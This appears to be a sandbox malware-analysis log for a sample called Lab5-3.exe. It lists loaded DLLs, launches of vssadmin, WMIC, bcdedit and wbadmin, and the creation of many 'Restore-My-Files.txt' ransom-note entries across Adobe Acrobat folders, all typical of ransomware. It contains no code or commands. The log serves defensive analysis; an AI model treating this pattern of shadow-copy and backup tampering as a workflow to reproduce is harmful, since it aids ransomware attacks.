                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: browcli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: slc.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: pcacli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: comsvcs.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cmlua.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cmutil.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: colorui.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mscms.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: coloradapterclient.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: drprov.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: winsta.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: ntlanman.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: davclnt.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: davhlpr.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wkscli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: browcli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: slc.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: pcacli.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: blb_ps.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: blb_ps.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                      Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\Lab5-3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile written: C:\$RECYCLE.BIN\desktop.iniJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\it-it\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\ja-jp\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\root\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\sv-se\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\nls\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\home\js\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\css\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\images\themes\dark\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ca-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\cs-cz\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\da-dk\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\de-de\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\en-ae\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\en-il\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\es-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\eu-es\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\fi-fi\Restore-My-Files.txtJump to behavior
                      Source: C:\Users\user\Desktop\Lab5-3.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\fr-fr\Restore-My-Files.txtJump to behavior
